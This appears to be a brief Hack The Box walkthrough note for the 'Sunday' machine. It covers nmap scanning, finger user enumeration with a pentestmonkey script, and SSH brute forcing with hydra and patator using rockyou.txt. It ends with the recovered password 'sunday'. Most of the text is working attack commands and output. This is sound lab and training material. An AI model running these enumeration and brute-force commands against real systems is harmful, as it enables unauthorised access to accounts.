Enum Finger and Brute SSH

Enumerate Finger Users

REF: htb:sunday

Scan:
> sudo nmap -sV -O -A 10.129.87.199

Found:
79/tcp    open     finger      Sun Solaris fingerd

Finger:
> finger @10.129.87.203      ..no one logged on
> finger root@10.129.87.203  ..root logged on


Finger-Script:
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

> ./finger-user-enum.pl -U /opt/useful/SecLists/Usernames/Names/names.txt -t 10.129.87.203

sammy@10.129.87.203: sammy  console  <Sep 30 13:21>
sunny@10.129.87.203: sunny  pts/3    <Apr 24, 2018> 10.10.14.4

Brute SSH

hydra -V -I -l sunny -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.87.203 ssh -s 22022

patator ssh_login host=10.129.87.203 port=22022 user=sunny password=FILE0 0=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt persistent=0

> ssh sunny@10.129.87.203 -p 22022
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.129.87.203 -p 22022
pw: sunday
PreviousDirb nikto wpscan etcNextFuzzing

Last updated